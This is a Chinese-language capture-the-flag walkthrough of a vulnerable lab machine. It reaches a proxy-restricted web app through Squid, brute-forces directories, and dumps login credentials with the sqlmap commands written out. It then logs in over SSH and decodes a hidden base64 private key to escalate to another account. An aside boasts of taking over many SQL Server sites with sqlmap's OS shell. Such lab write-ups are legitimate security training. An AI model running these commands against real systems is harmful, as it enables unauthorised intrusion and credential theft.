目录
0x00:写在前面
下载靶场以后,找到目标nmap等等工具进行探测存活主机即可,不多赘述
0x01:信息收集
直接nmap扫一下目标ip端口
扫出来3个端口
8080:http服务31337:Squid是一个多用途和高自由度的代理/缓存软件64666:ssh服务访问一下8080端口
显示403 forbidden ,nginx的站
之前搭建过Squid服务,其可以作为HTTP proxy来绕过部分内网中的不安全因素,并可以在外网中掩盖身份,从而达到安全访问互联网的目的
然后google一下,发现,可以通过proxy(代理)来进行访问127.0.0.1:8080(因为服务器的web端口是8080),可能是服务器做了限制,只能访问127.0.0.1或者localhost的web
反向代理:通过代理服务器来访问,这里的代理服务器是31337端口,所以我们先来用curl来试一下
curl 127.0.0.1:8080 -x 10.27.2.231:31337发现是有东西的,那就成功啦
我们用dirb来跑一下目录
dirb :8080 -p 10.27.2.231:31337发现没跑出来什么东西,那就用dirbuster(这个工具也有个proxy代理设置)
挂上代理以后开始暴
http://127.0.0.1:8080/littlesecrets-main/这是个登录页面
肯定有注入啦!!!
通过尝试sqlmap如下参数可以爆出目标数据库信息
sqlmap yyds,这次打了个市的hvv比赛,sqlmap --os-shell拿下几万分sqlserver的站,直接把一个目标资产打穿了
命令1:sqlmap --proxy=:31337 --level=5 --dbms=mysql -r /Users/xubowen/123burp.txt
命令2:sqlmap -u ":8080/littlesecrets-main/login.php" --data="user=1&pass=1" --proxy=:31337 --level=5 -T users -C "user,pass" --dump
—level>3就可以爆http字段
爆出来以后
web页面的登录不行,但是我们还有ssh
ssh登录成功
在这个目录下
打开.ul...
然后base64解码
base64 -d .ultra… >~/basexbw
chmod 600 basexbw
ssh pinky@localhost -i(秘钥)~/basexbw -p端口
即可getflag
0x02:总结
渗透的本质就是信息收集加上知识点的串联